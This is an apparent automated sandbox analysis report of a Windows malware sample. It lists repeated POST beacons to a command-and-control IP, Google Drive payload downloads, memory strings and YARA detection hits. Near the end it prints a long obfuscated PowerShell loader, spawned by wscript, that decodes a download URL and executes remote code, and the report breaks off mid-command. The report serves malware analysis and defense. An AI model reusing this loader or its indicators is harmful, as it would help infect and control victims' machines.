Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: global traffic HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: unknown HTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 180Connection: close
Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://137.184.191.215/index.php/check.php?s=am9ntjjw
Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://137.184.191.215/index.php/check.php?s=am9ntjjwY
Source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2241557151.00000297D7826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2241557151.00000297D5A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3029993091.0000000004471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2241557151.00000297D5A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.3029993091.0000000004471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2241557151.00000297D77E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googPB
Source: powershell.exe, 00000002.00000002.2241557151.00000297D5C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D74A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: powershell.exe, 00000002.00000002.2280020509.00000297EE1A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u32
Source: powershell.exe, 00000002.00000002.2241557151.00000297D5C97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_uP
Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_uXR
Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt
Source: powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: msiexec.exe String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000002.00000002.2241557151.00000297D5F05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download
Source: msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
Source: powershell.exe, 00000002.00000002.2241557151.00000297D5F05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.coma
Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2241557151.00000297D6650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49715 version: TLS 1.2

System Summary

barindex
Source: amsi32_5588.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer 